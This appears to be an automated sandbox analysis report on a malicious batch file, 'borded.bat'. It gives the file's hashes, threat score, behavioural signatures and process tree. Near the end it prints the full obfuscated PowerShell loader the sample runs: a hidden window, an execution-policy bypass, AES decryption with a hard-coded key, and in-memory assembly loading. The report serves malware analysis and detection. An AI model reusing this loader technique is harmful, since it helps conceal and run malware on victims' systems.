Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13/10/2024, 17:28
Static task
static1
Behavioral task
behavioral1
Sample
borded.bat
Resource
win7-20240903-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
borded.bat
Resource
win10v2004-20241007-en
9 signatures
150 seconds
General
-
Target
borded.bat
-
Size
292KB
-
MD5
758e9341b9f8217cdb5b0085321d65f7
-
SHA1
704a2713704861618c153ccbb19847dcb0cdc5ce
-
SHA256
6f6d8b52f73e7de40ca70f74c1694ee57d9ff8b232ac00982c25f05db8dea39a
-
SHA512
bca661e49102b89a9c4de60db129472c87346a3bebf831fa847bfefa68896bbe07555c29b2573fa2bee378cd769015d56e1044cb5749d9baedd4f4398f6702a1
-
SSDEEP
6144:qZztTwoXBISDEO5PvFvC0oFQFTUQKtUlDKtlxRO8Ld8ecYS:qZzt7hDHZtq0oFcUQkzxRO8p0D
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2104 powershell.exe -
Deletes itself 1 IoCs
pid Process 1704 cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2104 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2104 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1704 wrote to memory of 2104 1704 cmd.exe 31 PID 1704 wrote to memory of 2104 1704 cmd.exe 31 PID 1704 wrote to memory of 2104 1704 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\borded.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ueAWR8PVJfD3DBWmyPJ4kswoS1OvTopyFQBQ9orAyoM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t0bOAX8n/tcDkfMsJHDdpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lOoFA=New-Object System.IO.MemoryStream(,$param_var); $PWXpD=New-Object System.IO.MemoryStream; $bNXzl=New-Object System.IO.Compression.GZipStream($lOoFA, [IO.Compression.CompressionMode]::Decompress); $bNXzl.CopyTo($PWXpD); $bNXzl.Dispose(); $lOoFA.Dispose(); $PWXpD.Dispose(); $PWXpD.ToArray();}function execute_function($param_var,$param2_var){ $PeMYH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MWRZU=$PeMYH.EntryPoint; $MWRZU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\borded.bat';$aNAUl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\borded.bat').Split([Environment]::NewLine);foreach ($nviWS in $aNAUl) { if ($nviWS.StartsWith(':: ')) { $Lhexm=$nviWS.Substring(3); break; }}$payloads_var=[string[]]$Lhexm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104
-